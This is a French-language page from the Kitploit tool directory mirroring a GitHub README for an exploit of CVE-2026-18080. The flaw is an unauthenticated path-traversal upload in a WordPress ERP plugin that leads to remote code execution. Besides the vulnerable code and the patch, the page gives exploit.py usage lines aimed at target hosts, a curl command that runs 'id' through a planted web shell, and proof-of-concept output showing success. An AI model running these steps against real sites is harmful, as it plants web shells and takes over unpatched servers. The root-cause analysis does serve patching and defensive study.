Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
By-Poloss..-..CVE-2026-18080 — Exploit pour CVE-2026-18080, un téléversement de fichier arbitraire non authentifié menant à une exécution de code à distance (RCE) dans ERP Complete HR, Accounting & CRM Suite. Inclut des scripts Python et PHP pour l'exploitation automatisée. | Kitploit
Outils/GitHubGitHub/polosss/by-poloss..-..cve-2026-18080
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed TeamingDéveloppement de Charges Utiles
GitHubpolosss/by-poloss..-..cve-2026-18080

By-Poloss..-..CVE-2026-18080

Exploit pour CVE-2026-18080, un téléversement de fichier arbitraire non authentifié menant à une exécution de code à distance (RCE) dans ERP Complete HR, Accounting & CRM Suite. Inclut des scripts Python et PHP pour l'exploitation automatisée.

Voir le dépôt
8il y a 20 joursPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-18080 — ERP Complete HR, Accounting & CRM Suite <= 1.17.7

Téléversement arbitraire de fichier non authentifié via pièce jointe IMAP de CRM Email Connect (Path Traversal → RCE)

ChampValeur
CVEhttps://nvd.nist.gov/vuln/detail/CVE-2026-18080
Wordfencehttps://www.wordfence.com/threat-intel/vulnerabilities/id/b9d11eb9-5e18-459f-a9d4-cccb1d593402
Correctifhttps://plugins.trac.wordpress.org/changeset/3656848/erp
CVSS9.8 (Critique)
CWECWE-434 (Téléversement sans restriction de fichier de type dangereux)
ImpactéVersions du plugin ERP <= 1.17.7 (corrigé dans la 1.17.8)

Description

La fonction save_attachments() du plugin ERP dans GmailSync.php traite les pièces jointes des e-mails entrants via IMAP sans normalisation des chemins. Un attaquant peut créer un e-mail avec un nom de fichier tel que ../../plugins/shell.php et un en-tête References falsifié correspondant au modèle attendu par le plugin. La tâche cron de synchronisation IMAP écrit le fichier en dehors du répertoire crm-attachments/ protégé par .htaccess dans n'importe quel chemin accessible en écriture sous wp-content/.

Cause racine

Dans GmailSync.php (v1.17.7) :

root@kitploit:~
$name = $item['name'];              // Pas de basename() ni de normalisation des chemins
$file = wp_check_filetype( $item['name'] );
// ...
$saved = $wp_filesystem->put_contents( $dir . $name, $item['data'] );

Le nom de fichier ../../plugins/shell.php concaténé avec $dir (wp-content/uploads/crm-attachments/) se résout en wp-content/plugins/shell.php — un répertoire où l'exécution de PHP est autorisée.

Le correctif (v1.17.8) ajoute sanitize_attachment_filename() qui supprime les composants de répertoire via basename(), rejette les séparateurs de chemins et bloque les extensions dangereuses.

Exploitation

Méthode 1 : Directe (wp-cli)

root@kitploit:~
python3 exploit.py -t https://wordpress.ddev.site

Méthode 2 : Chemin personnalisé et nom de shell

root@kitploit:~
python3 exploit.py -t https://target.com --shell evil.php --path themes

Méthode 3 : Sonde phpinfo

root@kitploit:~
python3 exploit.py -t https://target.com --phpinfo

Après un téléversement réussi :

root@kitploit:~
curl -X POST -d 'cmd=id' 'https://target.com/wp-content/plugins/cve-2026-18080.php'

Preuve de concept

root@kitploit:~
RESULT: [{"name":"../../plugins/cve-2026-18080.php","slug":"../../plugins/cve-2026-18080.php","path":".../crm-attachments/../../plugins/cve-2026-18080.php"}]
SUCCESS: wp-content/plugins/cve-2026-18080.php (57 bytes)
RCE: uid=1000(god) gid=1000(god)

Fichiers

FichierDescription
exploit.pyScript d'exploitation Python utilisant wp-cli
exploit.phpExploit PHP autonome pour wp eval-file
README.mdCe fichier
Télécharger l’outil